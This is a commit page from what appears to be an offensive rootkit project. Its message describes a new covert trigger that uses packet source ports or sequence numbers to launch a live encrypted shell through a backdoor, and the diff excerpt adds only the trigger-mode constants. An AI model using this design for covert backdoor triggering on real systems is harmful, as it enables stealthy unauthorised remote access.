Added new hidden payload stream mode, now triggered using the source port. Fully integrated already, can select between that and seqnum in client. Both launch live encrypted shell via v3 backdoor

This commit is contained in:
h3xduck
2022-05-09 20:16:13 -04:00
parent ff0f34c6a4
commit 5320f35d01
11 changed files with 3447 additions and 2488 deletions

View File

@@ -27,6 +27,9 @@ int client_mode = CLIENT_MODE_LIVE_COMMAND;
#define GC_SERVER_CLOSE_CONN "EXIT"
#define CLIENT_MULTI_PACKET_TRIGGER_MODE_SEQ_NUM 0
#define CLIENT_MULTI_PACKET_TRIGGER_MODE_SRC_PORT 1
/**
* @brief Manages the result of a possible global command understood by the client overall